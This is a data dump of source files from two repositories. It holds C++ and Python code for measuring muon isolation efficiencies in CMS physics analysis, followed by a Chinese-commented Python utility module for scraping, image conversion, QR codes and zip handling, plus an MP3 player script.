= 0; nre<region.size(); nre++){\n\t \n\t if (!IsEtaRegion[nre]) continue;\n\t \n\t m_2Dyields[\"RecoMuon\"]->Fill(mid, nre, weight);\t \n\t \n\t for (unsigned int npu = 0; npu<PUr.size(); npu++){\n\t \n\t if (!IsPURegime[npu]) continue;\n\n\t for (unsigned int npT = 0; npT<pTr.size(); npT++){\n\t \n\t if (!IspTRegime[npT]) continue;\n\t \n\t TString HNameRef = IDName[mid]+region[nre]+PUr[npu]+pTr[npT];\n\t \n\t m_prof[HNameRef+\"dXYVsPt\"] ->Fill(dXY, muon.pt, weight);\n\t m_prof[HNameRef+\"dZVsPt\"] ->Fill(dZ, muon.pt, weight);\n\t \n\t m_prof[HNameRef+\"PtVsdXY\"] ->Fill(muon.pt, dXY, weight);\n\t m_prof[HNameRef+\"PtVsdZ\"] ->Fill(muon.pt, dZ, weight);\n\t \n\t m_prof[HNameRef+\"PtVsVtx\"] ->Fill(muon.pt, ev.nVtx, weight);\n\t \n\t m_2Dplots[HNameRef+\"PtVspdgID\"]->Fill(muon.pt, GenMatchMotherID, weight);\n\n\t m_plots[HNameRef+\"NumGenJets\"] ->Fill(NGenJets, weight);\n\n\t std::vector<float> ChHadIso, NeHadIso, PhIso, ChPUIso;\n\t std::vector<float> TotalIso, TotalIsoNoDB, RelIso, RelIsoNoDB;\n\t // Isolation (R=0.4)\n\t ChHadIso.push_back(muon.chargedHadronIso);\n\t NeHadIso.push_back(muon.neutralHadronIso);\n\t PhIso.push_back (muon.photonIso);\n\t ChPUIso.push_back (muon.chargedHadronIsoPU);\t \t \n\t // PUPPI \n\t ChHadIso.push_back(muon.PUPPIIsoCH);\n\t NeHadIso.push_back(muon.PUPPIIsoNH);\n\t PhIso.push_back (muon.PUPPIIsoPH);\n\t ChPUIso.push_back (0.0);\n\t // PUPPI Lep\n\t ChHadIso.push_back(0.0);\n\t NeHadIso.push_back(0.0);\n\t PhIso.push_back (0.0);\n\t ChPUIso.push_back (0.0);\n\t // PUPPI NoLep\n\t ChHadIso.push_back(0.0);\n\t NeHadIso.push_back(0.0);\n\t PhIso.push_back (0.0);\n\t ChPUIso.push_back (0.0);\n\t // Mini-Isolation\n\t ChHadIso.push_back(muon.MiniIsoCH);\n\t NeHadIso.push_back(muon.MiniIsoNH);\n\t PhIso.push_back (muon.MiniIsoPH);\n\t ChPUIso.push_back (muon.MiniIsoPU);\n\t \n\t // --Total Isolations\n\t for(unsigned int iISO=0; iISO < IsoName.size(); iISO++){\n\t\tfloat iIso = ChHadIso[iISO] + std::max(0., NeHadIso[iISO] + PhIso[iISO] - 1.0*DBfactor*ChPUIso[iISO]);\n\t\tfloat iIsoNoDB = ChHadIso[iISO] + NeHadIso[iISO] + PhIso[iISO];\n\n\t\tif(iISO == BinIsoName::ISOPUPPILep){\n\t\t iIso = muon.PUPPILepIso;\n\t\t iIsoNoDB = muon.PUPPILepIso;\n\t\t}\n\t\t\n\t\tif(iISO == BinIsoName::ISOPUPPINoLep){\n\t\t iIso = muon.PUPPINoLepIso;\n\t\t iIsoNoDB = muon.PUPPINoLepIso;\n\t\t}\n\n\t\tTotalIso.push_back(iIso);\n\t\tif(iISO == BinIsoName::ISOPF || iISO == BinIsoName::MiniISO) \n\t\t RelIso.push_back(iIso/muon.pt); \n\t\telse RelIso.push_back(iIso); \n\t\t\n\t\tTotalIsoNoDB.push_back(iIsoNoDB);\n\t\tif(iISO == BinIsoName::ISOPF || iISO == BinIsoName::MiniISO) \n\t\t RelIsoNoDB.push_back(iIsoNoDB/muon.pt);\n\t\telse RelIsoNoDB.push_back(iIsoNoDB);\n\n\t }\n\t \n\t for(unsigned int iISO=0; iISO < IsoName.size(); iISO++){\n\t\t\n\t\t//std::cout << iISO << \" for \"<< RelIsoNoDB.size() << \" value=\" << RelIsoNoDB[iISO] << \" relIsoNoDB and \" << RelIso.size() << \" for RelIso value=\" << RelIso[iISO] << std::endl;\n\t\t\n\t\tHNameRef = IDName[mid]+region[nre]+PUr[npu]+pTr[npT]+IsoName[iISO];\n\n\t\t// Isolation Components\n\t\tm_plots[HNameRef+\"ChHadIso\"]->Fill(ChHadIso[iISO],weight);\n\t\tm_plots[HNameRef+\"NeHadIso\"]->Fill(NeHadIso[iISO],weight);\n\t\tm_plots[HNameRef+\"PhIso\"] ->Fill(PhIso[iISO], weight);\n\t\tm_plots[HNameRef+\"PUIso\"] ->Fill(ChPUIso[iISO], weight);\n\t\t// Isolation Components Vs Vtx\n\t\tm_prof[HNameRef+\"VtxVsChHadIso\"]->Fill(ev.nVtx, ChHadIso[iISO], weight);\n\t\tm_prof[HNameRef+\"VtxVsNeHadIso\"]->Fill(ev.nVtx, NeHadIso[iISO], weight);\n\t\tm_prof[HNameRef+\"VtxVsPhIso\"] ->Fill(ev.nVtx, PhIso[iISO], weight);\n\t\tm_prof[HNameRef+\"VtxVsPUIso\"] ->Fill(ev.nVtx, ChPUIso[iISO], weight);\n\t\t// ---------------------------------------------------------------------------------------\n\t\t// Total Isolation\n\t\tm_plots[HNameRef+\"TotalIso\"] ->Fill(TotalIso[iISO], weight);\n\t\tm_prof[HNameRef+\"VtxVsTotalIso\"] ->Fill(ev.nVtx, TotalIso[iISO], weight);\n\t\tm_prof[HNameRef+\"PtVsTotalIso\"] ->Fill(muon.pt, TotalIso[iISO], weight);\n\t\tm_prof[HNameRef+\"NumGenJetsVsTotalIso\"]->Fill(NGenJets,TotalIso[iISO], weight);\n\t\t// Total Isolation w/o DB corrections\n\t\tm_plots[HNameRef+\"TotalIsoNoDB\"] ->Fill(TotalIsoNoDB[iISO], weight);\n\t\tm_prof[HNameRef+\"VtxVsTotalIsoNoDB\"] ->Fill(ev.nVtx, TotalIsoNoDB[iISO], weight);\n\t\tm_prof[HNameRef+\"PtVsTotalIsoNoDB\"] ->Fill(muon.pt, TotalIsoNoDB[iISO], weight);\n\t\tm_prof[HNameRef+\"NumGenJetsVsTotalIsoNoDB\"]->Fill(NGenJets,TotalIsoNoDB[iISO], weight);\n\t\t// Relative Isolation\n\t\tm_plots[HNameRef+\"RelIso\"] ->Fill(RelIso[iISO], weight);\t\t\n\t\tm_prof[HNameRef+\"VtxVsRelIso\"] ->Fill(ev.nVtx, RelIso[iISO], weight);\n\t\tm_prof[HNameRef+\"PtVsRelIso\"] ->Fill(muon.pt, RelIso[iISO], weight);\n\t\tm_prof[HNameRef+\"NumGenJetsVsRelIso\"]->Fill(NGenJets, RelIso[iISO],weight);\n\t\tm_prof[HNameRef+\"dXYVsRelIso\"] ->Fill(dXY, RelIso[iISO], weight);\n\t\tm_prof[HNameRef+\"dZVsRelIso\"] ->Fill(dZ, RelIso[iISO], weight);\n\t\t// Relative Isolation w/o DB corrections\n\t\tm_plots[HNameRef+\"RelIsoNoDB\"] ->Fill(RelIsoNoDB[iISO], weight);\n\t\tm_prof[HNameRef+\"VtxVsRelIsoNoDB\"] ->Fill(ev.nVtx, RelIsoNoDB[iISO], weight);\n\t\tm_prof[HNameRef+\"PtVsRelIsoNoDB\"] ->Fill(muon.pt, RelIsoNoDB[iISO], weight);\n\t\tm_prof[HNameRef+\"NumGenJetsVsRelIsoNoDB\"]->Fill(NGenJets, RelIsoNoDB[iISO],weight);\n\t\tm_prof[HNameRef+\"dXYVsRelIsoNoDB\"] ->Fill(dXY, RelIsoNoDB[iISO], weight);\n\t\tm_prof[HNameRef+\"dZVsRelIsoNoDB\"] ->Fill(dZ, RelIsoNoDB[iISO], weight);\n\n\t\tif(muon.pt > pTeta){\n\t\t m_prof[HNameRef+\"EtaVsTotalIso\"] ->Fill(muon.eta, TotalIso[iISO], weight);\n\t\t m_prof[HNameRef+\"EtaVsTotalIsoNoDB\"]->Fill(muon.eta, TotalIsoNoDB[iISO],weight);\n\t\t m_prof[HNameRef+\"EtaVsRelIso\"] ->Fill(muon.eta, RelIso[iISO], weight);\n\t\t m_prof[HNameRef+\"EtaVsRelIsoNoDB\"] ->Fill(muon.eta, RelIsoNoDB[iISO], weight);\n\t\t}\n\n\t\tint vRelIsoCut = 1 + std::round(RelIso[iISO]*100.);\n\t\tfor (int ibin=vRelIsoCut; ibin<=100; ibin++) m_plots[HNameRef+\"RelIsoCut\"]->AddBinContent(ibin, weight);\n\t\tm_plots[HNameRef+\"RelIsoCut\"]->AddBinContent(101, weight); // Total Number of Muons \n\t\t\n\t\t// -- Isolation WorkingPoints\n\t\tstd::vector<float> iISOwp = iISOwpFromUser[iISO];\n\t\tstd::vector<TString> nISOwp = isowp[iISO];\n\t\t\n\t\tfor(int isocat=0;isocat < iISOwp.size();isocat++){\n\t\t \n\t\t if(RelIso[iISO] > iISOwp[isocat]) continue;\n\t\t \n\t\t HNameRef = IDName[mid]+region[nre]+PUr[npu]+pTr[npT]+IsoName[iISO]+nISOwp[isocat];\n\t\t\n\t\t number[HNameRef+\"muons\"]++;\n\t\t\n\t\t m_plots[HNameRef+\"Vtx\"] ->Fill(ev.nVtx, weight);\n\t\t m_plots[HNameRef+\"Pt\"] ->Fill(muon.pt, weight);\n\t\t m_plots[HNameRef+\"NumGenJets\"]->Fill(NGenJets,weight);\n\t\t m_plots[HNameRef+\"dXY\"] ->Fill(dXY, weight);\n\t\t m_plots[HNameRef+\"dZ\"] ->Fill(dZ, weight);\n\t\t \n\t\t if(muon.pt > pTeta) m_plots[HNameRef+\"Eta\"] ->Fill(muon.eta, weight);\n\t\t\n\t\t} // for(IsoCategory)\n\t\t\n\t } // for(Isolation)\n\n\t } // for(pTRegime)\n\n\t } // for(PURegime)\n\t\n\t} // for(etaRegion)\n \n } // for(muonID)\n \n } // if(muon pT eta)\n }// for(Muons)\n \n m_plots[\"NMuons\"]->Fill(number[\"muons\"],weight);\n \n for (unsigned int mid = 0; mid<IDName.size(); mid++)\n for (unsigned int nre = 0; nre<region.size(); nre++)\n for (unsigned int npu = 0; npu<PUr.size(); npu++)\n \tfor (unsigned int npT = 0; npT<pTr.size(); npT++)\t \n \t for(unsigned int iISO=0; iISO < IsoName.size(); iISO++)\n \t for(unsigned int isocat=0; isocat<isowp[iISO].size(); isocat++){\n \t TString iname = IDName[mid]+region[nre]+PUr[npu]+pTr[npT]+IsoName[iISO]+isowp[iISO][isocat]; \n\n \t m_plots[iname+\"NMuons\"]->Fill(number[iname+\"muons\"],weight);\n \t }\n\n \n //}// IF(PV-HP) \n} // void::fill\n \n\n//Functions\n\nvoid muon_pog::print_progress(int TreeEntries, Long64_t ievt){\n if(TreeEntries < 50) TreeEntries = 50;\n int step = TreeEntries/50;\n if (ievt%(step) == 0){ \n float progress=(ievt)/(TreeEntries*1.0);\n int barWidth = 50;\n \n std::cout << \"[\";\n int pos = barWidth * progress;\n \n for (int i = 0; i < barWidth; ++i) {\n if (i < pos) std::cout << \"=\";\n else if (i == pos) std::cout << \">\";\n else std::cout << \" \";\n }\n \n std::cout << \"] \" << int(progress * 100.0) << \" %\\r\";\n std::cout.flush();\n } \n}\n\n\nvoid muon_pog::parseConfig(const std::string configFile, muon_pog::TagAndProbeConfig & tpConfig,\n\t\t\t std::vector<muon_pog::SampleConfig> & sampleConfigs)\n{\n \n boost::property_tree::ptree pt;\n \n try\n {\n boost::property_tree::ini_parser::read_ini(configFile, pt);\n }\n catch (boost::property_tree::ini_parser::ini_parser_error iniParseErr)\n {\n std::cout << \"[TagAndProbeConfig] Can't open : \" << iniParseErr.filename()\n\t\t<< \"\\n\\tin line : \" << iniParseErr.line()\n\t\t<< \"\\n\\thas error :\" << iniParseErr.message()\n\t\t<< std::endl;\n throw std::runtime_error(\"Bad INI parsing\");\n }\n\n for( auto vt : pt )\n {\n if (vt.first.find(\"TagAndProbe\") != std::string::npos)\n\ttpConfig = muon_pog::TagAndProbeConfig(vt);\n else\n\tsampleConfigs.push_back(muon_pog::SampleConfig(vt));\n }\n}\n\nvoid muon_pog::comparisonPlots(std::vector<muon_pog::Plotter> & plotters,\n \t\t\t TFile *outFile, TString & outputDir)\n{\n\n outFile->cd(\"/\");\n \n}\n\nvoid muon_pog::copyPhp(const TString & outputDir)\n{\n \n system(\"cp index.php \" + outputDir);\n \n boost::filesystem::directory_iterator dirIt(outputDir.Data());\n boost::filesystem::directory_iterator dirEnd;\n for (;dirIt != dirEnd; ++ dirIt)\n {\n if (boost::filesystem::is_directory(dirIt->status()))\n\tcopyPhp(TString(dirIt->path().string()));\n }\n\n}\n\nstd::vector<TString> GetListOfFiles(TString FileName){\n std::vector<TString> ListOfSamples;\n std::ifstream InFile;\n InFile.open(FileName);\n if (!InFile){\n std::cout << \"File \" << FileName << \" not found!\" << std::endl;\n std::exit(0);\n }\n else{\n std::string tmpLine;\n while (std::getline(InFile,tmpLine)){\n TString TxtLine = tmpLine;\n if (!TxtLine.Contains(\"#\") && TxtLine.Contains(\".root\")) ListOfSamples.push_back(TxtLine);\n }// while\n }\n \n return ListOfSamples;\n}\n\n// LocalWords: IsoTight\n" }, { "alpha_fraction": 0.5681818127632141, "alphanum_fraction": 0.6257575750350952, "avg_line_length": 26.5, "blob_id": "6293ee42416fa7e7ef84964e27822e8a1bfb6f68", "content_id": "f0ccdfbc2fda2ba4d74cab98639d17a2050efa55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1320, "license_type": "no_license", "max_line_length": 229, "num_lines": 48, "path": "/Tools/efficiencies/SubmitJobs.py", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, time, socket, sys\n\nBaseCMSDir = os.environ[\"CMSSW_BASE\"]+\"/src\"\nOutputName = str(sys.argv[1])\ntqu = \"1nd\"\n#tqu = \"8nh\"\nConfigDir = \"config/config\"\nConfigs = [\n #\"DY\",\n # \"QCD_pT15to20\",\n # \"QCD_pT20to30\",\n # \"QCD_pT30to50\",\n # \"QCD_pT50to80\",\n # \"QCD_pT80to120\",\n # \"QCD_pT120to170\",\n # \"QCD_pT170to300\",\n \"QCD_pT300to470\",\n ## \"QCD_pT470to600\",\n #\"QCD_pT600to800\",\n #\"QCD_pT800to1000\",\n ## \"QCD_pT1000toInf\",\n ]\n\nRunFileName = \"ToSubmit.sh\"\n\nfor cfg in Configs: \n fout = open(RunFileName, \"w\")\n print>>fout, 'export CMSSW_PROJECT_SRC=\"' + BaseCMSDir + '\"'\n print>>fout, \"\"\"\nexport EXE_FILE=\"MuonPOGtreeProducer/Tools/efficiencies/ISOEfficiency.run\"\nexport TOP=\"$PWD\"\ncd $CMSSW_PROJECT_SRC\neval `scramv1 runtime -sh`\ncd $TOP\n\"\"\"\n print>>fout, '$CMSSW_PROJECT_SRC/$EXE_FILE $CMSSW_PROJECT_SRC/MuonPOGtreeProducer/Tools/efficiencies/' + ConfigDir + cfg + '.ini $CMSSW_PROJECT_SRC/MuonPOGtreeProducer/Tools/efficiencies/MuonResults ' + cfg + '_' + OutputName\n \n fout = None\n os.chmod(RunFileName,0744)\n command = 'bsub -R \"pool>300000\" -q ' + tqu + ' -J ' + cfg + ' < ' + RunFileName\n\n print 'Submitting job with command: '\n print str(command)\n os.system( command )\n\n \nos.system( \"rm \" + RunFileName )\n" }, { "alpha_fraction": 0.7037533521652222, "alphanum_fraction": 0.8042895197868347, "avg_line_length": 23.83333396911621, "blob_id": "85c3d977819b6b54082ac630560252f03e4c8bec", "content_id": "4809c7ae64a0c9fac352a085a7f002784e87e099", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 746, "license_type": "no_license", "max_line_length": 169, "num_lines": 30, "path": "/Tools/efficiencies/config/configDY.ini", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "[TagAndProbe]\nprobe_minPt=5\n\niso_DeltaBeta=0.5\n;PF\niso_LooseWP=0.25\niso_TightWP=0.15\n;PUPPI\nisoPUPPI_LooseWP=0.25\nisoPUPPI_TightWP=0.17\nisoPUPPILep_LooseWP=0.25\nisoPUPPILep_TightWP=0.17\nisoPUPPINoLep_LooseWP=0.25\nisoPUPPINoLep_TightWP=0.17\n;MiniPF\nMiniiso_LooseWP=0.40\nMiniiso_TightWP=0.10\n\nIDMedium_CutdXY=0.2\nIDMedium_CutdZ=0.5\n\ngen_DrCut=0.10\n\n[DY_SIGNAL] \n;fileName = /eos/cms/store/user/brochero/DYJetsToLL_M-50_TuneCP5_13TeV-amcatnloFXFX-pythia8_RunIISpring18MiniAOD-100X_upgrade2018_realistic_v10.root\nfileName = /afs/cern.ch/user/b/brochero/brochero_WorkArea/MuonPOG/MuonIsolation-100X/CMSSW_10_0_3/src/MuonPOGtreeProducer/Tools/efficiencies/InputLists/Test_DY-100X.list\nQCDWeight = 1.\nnEvents = 100000\napplyReweighting = false\nruns = 0\n\n" }, { "alpha_fraction": 0.7398229837417603, "alphanum_fraction": 0.7495574951171875, "avg_line_length": 36.66666793823242, "blob_id": "a4d2c4424fbe4086b83af3086186e53964def729", "content_id": "92a91ecd1283eea01f816dafde1ba5a39a3429ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1130, "license_type": "no_license", "max_line_length": 253, "num_lines": 30, "path": "/Tools/efficiencies/README.md", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "# Estimation of ISOLATION efficiencies using the MuonPOG ntuples\n\n# Ntuples production \nProcedure to produce the ntuples is well explained in MuonPOGtreeProducer/README.md.\n\n# Ntuples location\nNtuple produced are storage ```/eos/cms/store/group/phys_muon/Commissioning/Ntuples/Commissioning2017``` in directory.\n\n# Efficiency estimation\n1. ISOEfficiency.C contains definitions and definitions of all histograms.\n a. Histograms are produced, so far, for all different ID (trk, glb, loose, medium, tight, soft and high pT). \n2. To compile:\n```\n./ISOEfficiency\n```\n3. To run ONE job (it runs locally):\n```\n./ISOEfficiency.run config/CONFIG.ini OutputDir OutputFileName\n```\nMuonResults is the default output directory.\n4. In order to run the full set of samples (can be DY, QCD, ttbar, WJets, etc) the ```SubmitJobs.py``` macro has been created. To run it, first, you must check the samples in each file config included into ```Configs``` variable (line 9). After it, just\n```\npython SubmitJobs.py OutputFileName\n```\n5. To check the jobs\n```\nbjobs\n```\nOutputs are saved into ```MuonResults```\n6. Macros (readme in preparation ;) )\n" }, { "alpha_fraction": 0.6378504633903503, "alphanum_fraction": 0.7780373692512512, "avg_line_length": 19.33333396911621, "blob_id": "d1a816942a8cdb2ff2ce7523c9aed0756bf720b3", "content_id": "6ddfa0a6a89519d757478367bcc19809b59596b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 428, "license_type": "no_license", "max_line_length": 139, "num_lines": 21, "path": "/Tools/efficiencies/config/configQCD_pT50to80.ini", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "[TagAndProbe]\nmuon_trackType=PF\n;INNER, GLB, TUNEP, PF\n\nprobe_minPt=5\niso_LooseWP=0.25\niso_TightWP=0.15\niso_DeltaBeta=0.5\n\nIDMedium_CutdXY=0.2\nIDMedium_CutdZ=0.5\n\ngen_DrCut=0.10\n\n[QCD_BACKGROUND]\nfileName = /eos/cms/store/group/phys_muon/Commissioning/Ntuples/Commissioning2017/QCD_Pt-50to80_DRPremix-92X_upgrade2017_realistic_v10.root\nQCDWeight = 437504.\n;(19222500*0.02276)\nnEvents = 1000000\napplyReweighting = true\nruns = 0\n\n" } ]
13
drdxxx/myGit_public
https://github.com/drdxxx/myGit_public
a59440522e612f8d8e066cdc897fc4b12e11b422
95423fed6ff9fafc9ba5f421b55723b1cf29c088
0659fc4681cd2700a284e5be426e14db5802f132
refs/heads/master
2022-11-07T09:02:56.294247
2020-06-26T02:54:42
2020-06-26T02:54:42
274,104,285
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5565468072891235, "alphanum_fraction": 0.5634092688560486, "avg_line_length": 29.236515045166016, "blob_id": "5bd8e82021fc1f56a4ae51a913b0ea98c256b928", "content_id": "27e951da79d526c2ddb1aaa5f6fa57c3f1b1221a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8456, "license_type": "no_license", "max_line_length": 79, "num_lines": 241, "path": "/python/MyModules.py", "repo_name": "drdxxx/myGit_public", "src_encoding": "UTF-8", "text": "'''\n时间:2020.6.15\n作者:drd\n'''\n\nimport os\nimport re\nimport imghdr\nimport qrcode\nimport requests\nimport filetype\nimport zipfile\nimport win32com.client as win\nfrom requests import RequestException\nfrom PIL import Image\n\n#从指定url获取html页面内容\ndef get_page(url,headers=None,mode='get'):\n try:\n if mode == 'get':\n response = requests.get(url,headers)\n elif mode == 'post':\n response = requests.post(url,headers)\n if response.status_code == 200:\n return response.text\n else:\n print('请求失败,状态码:%d'%response.status_code)\n return -1\n except RequestException:\n return -1\n\n#对html文本进行正则匹配\ndef parse_page(reg,html):\n pattern = re.compile(reg, re.S)\n items = re.findall(pattern, html)\n if items != []:\n return items\n else:\n print('没有找到符合正则表达式的数据!')\n return None\n\n#将数据写入文件\ndef write_to_file(file_path,content,mode='w',encoding='utf-8'):\n with open(file_path, mode,encoding=encoding)as f:\n f.write(content)\n\n#判断指定图片是否损坏 若图片损坏,则删除,否则返回图片类型\ndef isImageDamage(img_path):\n if imghdr.what(img_path) == None:\n #图片已损坏\n os.remove(img_path)\n print('一张图片损坏,已删除!')\n return None\n else:\n return imghdr.what(img_path)\n\n#从指定的链接地址下载一张图片,下载成功返回1,下载失败返回0;url:图片的链接,img_path:图片保存的位置\ndef get_oneImage(url,img_path):\n try:\n image = requests.get(url)\n with open(img_path, \"wb\") as f:\n f.write(image.content)\n isImageDamage(img_path)\n return 1\n except:\n return 0\n\n#图片格式转换为JPG\n#source_dir:图片文件夹(所有文件必须是图片)或单张图片的位置\n#isDeleteRes:布尔量,是否删除原文件,默认False\ndef other_to_jpg(source_dir,isDeleteRes=False):\n if os.path.isdir(source_dir):\n flist = os.listdir(source_dir)\n for f in flist:\n img = Image.open(source_dir + '\\\\' + f,'r')\n if Image.isImageType(img):\n try:\n img.save((source_dir + '\\\\' + f)[:-4] + '.jpg')\n if type(isDeleteRes) == bool:\n if isDeleteRes == True:os.remove(source_dir + '\\\\' + f)\n except OSError:\n os.remove((source_dir + '\\\\' + f)[:-4] + '.jpg')\n print('convert_to_jpg error:%s'%f)\n else:\n img = Image.open(source_dir,'r')\n try:\n img.save(source_dir[:-4] + '.jpg')\n if type(isDeleteRes) == bool:\n if isDeleteRes == True: os.remove(source_dir)\n except OSError:\n os.remove(source_dir[:-4] + '.jpg')\n print('convert_to_jpg error!')\n\n#图片格式转换为PNG\n#source_dir:图片文件夹(所有文件必须是图片)或单张图片的位置\n#isDeleteRes:布尔量,是否删除原文件,默认False\ndef other_to_png(source_dir,isDeleteRes=False):\n if os.path.isdir(source_dir):\n flist = os.listdir(source_dir)\n for f in flist:\n img = Image.open(source_dir + '\\\\' + f,'r')\n if Image.isImageType(img):\n try:\n img.save((source_dir + '\\\\' + f)[:-4] + '.png')\n if type(isDeleteRes) == bool:\n if isDeleteRes == True:os.remove(source_dir + '\\\\' + f)\n except OSError:\n os.remove((source_dir + '\\\\' + f)[:-4] + '.png')\n print('convert_to_png error:%s'%f)\n else:\n img = Image.open(source_dir,'r')\n try:\n img.save(source_dir[:-4] + '.png')\n if type(isDeleteRes) == bool:\n if isDeleteRes == True: os.remove(source_dir)\n except OSError:\n os.remove(source_dir[:-4] + '.png')\n print('convert_to_png error!')\n\n#生成普通二维码\n#target_str:目标数据,可以是url,也可以是文本字符串\n#qrcode_path:二维码图片保存的位置\ndef create_normalQrcode(target_str,qrcode_path):\n qr = qrcode.QRCode(\n version=1,\n error_correction=qrcode.constants.ERROR_CORRECT_L,\n box_size=10,\n border=4,\n )\n qr.add_data(target_str)\n qr.make(fit=True)\n qr_img = qr.make_image(fill_color=\"blue\",back_color=\"white\")\n qr_img.save(qrcode_path)\n\n#生成带图片的二维码\n#target_str:目标数据,可以是url,也可以是文本字符串\n#img_path:二维码中的图片的位置,注意:图片只能是png格式\n#qrcode_path:二维码图片保存的位置\ndef create_withImgQrcode(target_str,img_path,qrcode_path):\n qr = qrcode.QRCode(\n version=2,\n error_correction=qrcode.constants.ERROR_CORRECT_H,\n box_size=10,\n border=1\n )\n qr.add_data(target_str)\n qr.make(fit=True)\n img = qr.make_image()\n img = img.convert(\"RGBA\")\n icon = Image.open(img_path)\n img_w, img_h = img.size\n factor = 4\n size_w = int(img_w / factor)\n size_h = int(img_h / factor)\n icon_w, icon_h = icon.size\n if icon_w > size_w:\n icon_w = size_w\n if icon_h > size_h:\n icon_h = size_h\n icon = icon.resize((icon_w, icon_h), Image.ANTIALIAS)\n w = int((img_w - icon_w) / 2)\n h = int((img_h - icon_h) / 2)\n img.paste(icon, (w, h), icon)\n img.save(qrcode_path)\n\n#读取指定压缩包中的文件,显示压缩包中的文件名,fname:压缩包路径xxx.zip,fileto:文件解压到哪个位置,默认是当前文件夹\ndef readZip(fname,fileto='./'):\n zip = zipfile.ZipFile(fname)\n print('%s压缩包中的文件:'%fname)\n flist = zip.namelist()\n for i in range(len(flist)):\n print(i,':',flist[i])\n t = input('是否解压全部文件到指定目录(y/n/q(表示退出))?')\n if t == 'y':\n #解压所有文件到指定路径\n for f in flist:\n zip.extract(f,fileto)\n elif t == 'q':\n #退出程序\n zip.close()\n return None\n else:\n files = input('请输入要解压的文件路径,以英文逗号隔开:')\n fls = list(files.split(','))\n for f in flist:\n if f in fls:\n zip.extract(f, fileto)\n print('解压完成!')\n zip.close()\n\n#识别文件或文件夹类型(支持文件夹,图像,视频,音频……,不支持wps文件类型:doc(x).xls(x).ppt(x))\n#返回值:‘None’-不能识别的类型,‘dir’-文件夹,其他-可识别类型\ndef identify_type(source_dir):\n if os.path.isdir(source_dir):\n return 'dir'\n else:\n fobj = filetype.guess(source_dir)\n if fobj is None:return None\n else:return fobj.extension\n\n#txt文件内容去重\n#txt_path:txt文件路径\n#encoding:文件字符编码,默认为utf-8\ndef txt_deduplicate(txt_path,encoding='utf-8'):\n if os.path.isfile(txt_path) and txt_path[-4:] == '.txt':\n with open(txt_path, \"r\",encoding=encoding) as f:\n txt_content = f.readlines()\n for i in range(len(txt_content)):\n for j in range(i+1,len(txt_content)):\n if txt_content[i] == txt_content[j]:txt_content[j] = ''\n os.remove(txt_path)\n with open(txt_path, \"a\",encoding=encoding) as f:\n for line in txt_content:\n if line != '':f.write(line)\n else:\n print('找不到指定txt文件!')\n\n#语音播放txt文件的内容\n#txt_path:txt文件路径\n#line:播放哪一行数据,默认为0,表示全部\n#encoding:文件字符编码,默认为utf-8\ndef txt_to_sound(txt_path,line=0,encoding='utf-8'):\n if os.path.isfile(txt_path) and txt_path[-4:] == '.txt':\n with open(txt_path, \"r\", encoding=encoding) as f:\n txt_content = f.readlines()\n if line == 0:\n sound = win.Dispatch('SAPI.SpVoice')\n for text in txt_content:\n sound.Speak(text)\n else:\n sound = win.Dispatch('SAPI.SpVoice')\n for i in range(len(txt_content)):\n if i == line - 1:\n sound.Speak(txt_content[i])\n else:\n print('找不到指定txt文件!')\n\n\n#if __name__ == '__main__':\n # txt_deduplicate('ttt.txt')\n # txt_to_sound(r'ttt.txt',2,'gbk')" }, { "alpha_fraction": 0.47227534651756287, "alphanum_fraction": 0.48661568760871887, "avg_line_length": 32.22222137451172, "blob_id": "cac967c2ed489347fc34b397411f71bf8cce842b", "content_id": "daa1a84b794e0f588a79a3e3ab16d56aeff71d5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2476, "license_type": "no_license", "max_line_length": 88, "num_lines": 63, "path": "/python/mp3Player.py", "repo_name": "drdxxx/myGit_public", "src_encoding": "UTF-8", "text": "'''\n时间:2020.6.18\n作者:drd\n'''\n\nimport os\nfrom random import choice\nimport win32com.client as win\nfrom playsound import playsound\n\n#播放mp3和wav文件\n#source_dir:音乐文件夹或一首音乐的位置\n#play_mode:播放模式(音乐文件夹),默认按顺序播放\n#play_count:播放多少首音乐,默认为0(play_mode='order'表示播放全部,play_mode='random'表示播放0首)\n#注意:音乐文件名不能包含中文,顺序播放时play_count必须<=(音乐文件名不包含中文且后缀名是.mp3和.wav的文件总数)\ndef mp3_player(source_dir,play_count=0,play_mode='order'):\n if os.path.isdir(source_dir):\n music_list = os.listdir(source_dir)\n if play_mode == 'order':\n mcount =0\n for m in music_list:\n if os.path.isfile(source_dir + '\\\\' + m) and m[-4:] in ('.wav','.mp3'):\n try:\n print('正在播放音乐:', m)\n playsound(source_dir + '\\\\' + m)\n mcount += 1\n except:\n print('音乐播放失败:',m)\n continue\n if mcount == play_count:\n break\n\n elif play_mode == 'random':\n is_stop = 0\n while is_stop != play_count:\n m = choice(music_list)\n if os.path.isfile(source_dir + '\\\\' + m) and m[-4:] in ('.wav', '.mp3'):\n try:\n print('正在播放音乐:', m)\n playsound(source_dir + '\\\\' + m)\n is_stop += 1\n except:\n print('音乐播放失败:', m)\n else:\n if source_dir[-4:] in ('.wav', '.mp3'):\n try:\n print('正在播放音乐:', os.path.basename(source_dir))\n playsound(source_dir)\n except:\n print('音乐播放失败:', os.path.basename(source_dir))\n\n\nif __name__ == '__main__':\n # 将文本转为语音并播放\n mpath = input('请输入音乐文件夹或音乐的路径:')\n list = mpath.split('\\\\')\n mpath = list[0]\n for i in range(1,len(list)):mpath =mpath + '\\\\\\\\' + list[i]\n text = '将要播放的音乐来源是:' + os.path.basename(mpath)\n print('音乐文件/文件夹路径:',mpath)\n sound = win.Dispatch('SAPI.SpVoice')\n sound.Speak(text)\n mp3_player(mpath,10,'random')" } ]
2
jandersson/Coursera_IIPP
https://github.com/jandersson/Coursera_IIPP
5b2e22dfd940538f222f39ea16bd3398f57088af
